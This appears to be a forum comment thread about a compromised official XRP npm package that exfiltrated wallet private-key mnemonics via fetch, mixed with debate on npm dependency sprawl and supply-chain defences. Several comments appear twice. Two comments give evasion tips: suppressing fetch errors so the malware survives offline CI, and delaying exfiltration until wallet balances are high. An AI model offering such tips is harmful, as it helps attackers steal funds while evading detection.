That fetch(…) is sending the mnemonic of the private key out to that remote server.
Interestingly if this is happening in a long running process and that exploit server is offline, the promise for the fetch will reject. And the default behavior for unhandled promise rejections would be for the node process to crash.
So if anybody tried testing this version of the library in a net gapped environment, it would crash and fail out in CI.
The attacker should have silenced the error with a .catch(_ => {}).
Fun fact: installing some common starter packages will explode to install over a 1000 npm packages, each of them can inject malware, even if the package isn’t used, and you’ll never know.
Many packages will have over a 100 dependencies if you include the dev dependencies, so you can easily break a 1000.
The crazy part here is that in most other ecosystems 100 dependencies is "crazy high" territory, and in JS it's apparently "we're just getting started". It's known for its approach to micropackaging everything in a separate library.
The crazy thing is more that multiple versions of the same package could be installed as dependencies of dependencies...
They were thinking to be the cool kids supporting multiple versions and that the old way to do packaging, like debian and co that expects everyone to use the same version, was the old legacy fart way to do things.
Just, developers before were engineers first and so designed things well especially to avoid this situation of dependency hell and supply chain injection.
But the web dev crowd decided to do "better" and now to have old problems as new problems...
npm design allows multiple versions of the same package if required, but deduplicates otherwise. It’s a smart design that more package managers should and will follow.
Smart developers spend their time working on original code rather than rewriting the wheel.
We run similar npm package monitors. The use of exotic tld domains such as 0x9c.xyz kind of gave it away because YARA Forge rules have native signatures to detect such domains.
It will be interesting t explore how the project got compromised and malicious packages published to the registry.
> Previously only the packed JavaScript code had been modified.
Honestly it's time for the npm ecosystem to move to a model where only build agents running on npm's own infrastructure can upload binary artifacts, or to mandate reproducible builds.
And for a select set of highly used packages, someone from NPM should be paid to look over each release's changeset.
That fetch(…) is sending the mnemonic of the private key out to that remote server.
Interestingly if this is happening in a long running process and that exploit server is offline, the promise for the fetch will reject. And the default behavior for unhandled promise rejections would be for the node process to crash.
So if anybody tried testing this version of the library in a net gapped environment, it would crash and fail out in CI.
The attacker should have silenced the error with a .catch(_ => {}).
Fun fact: installing some common starter packages will explode to install over a 1000 npm packages, each of them can inject malware, even if the package isn’t used, and you’ll never know.
Many packages will have over a 100 dependencies if you include the dev dependencies, so you can easily break a 1000.
does the postinstall script step has anything to do with this?
i noticed bun doesn't run them by default unless you whitelist them
That is a very fun fact.
Yes that is how dependencies work.
The crazy part here is that in most other ecosystems 100 dependencies is "crazy high" territory, and in JS it's apparently "we're just getting started". It's known for its approach to micropackaging everything in a separate library.
The crazy thing is more that multiple versions of the same package could be installed as dependencies of dependencies...
They were thinking to be the cool kids supporting multiple versions and that the old way to do packaging, like debian and co that expects everyone to use the same version, was the old legacy fart way to do things.
Just, developers before were engineers first and so designed things well especially to avoid this situation of dependency hell and supply chain injection. But the web dev crowd decided to do "better" and now to have old problems as new problems...
npm design allows multiple versions of the same package if required, but deduplicates otherwise. It’s a smart design that more package managers should and will follow.
Smart developers spend their time working on original code rather than rewriting the wheel.
Yes. It’s an engineering failure to have multiple copies of the same logic. That isn’t specific to JavaScript.
Cryptocurrency packages used at scale should have wallet decoys setup for early detection of vulnerabilities like this.
Red teaming this, you’d delay exfiltration of the private key until the balance passes beyond a certain amount and you’re on mainnet.
We run similar npm package monitors. The use of exotic tld domains such as 0x9c.xyz kind of gave it away because YARA Forge rules have native signatures to detect such domains.
It will be interesting t explore how the project got compromised and malicious packages published to the registry.
.xyz isn’t exotic for blockchains.
Official and thorough support for SBOM* within major package repositories can not come sooner.
* https://en.wikipedia.org/wiki/Software_supply_chain
> Previously only the packed JavaScript code had been modified.
Honestly it's time for the npm ecosystem to move to a model where only build agents running on npm's own infrastructure can upload binary artifacts, or to mandate reproducible builds.
And for a select set of highly used packages, someone from NPM should be paid to look over each release's changeset.
Both would have massively impeded the attacker.
I see the model of "download any old shit off the internet and run it in production" is working out so well.
I don’t have much opinion of XRP but this is their official package, not a community package.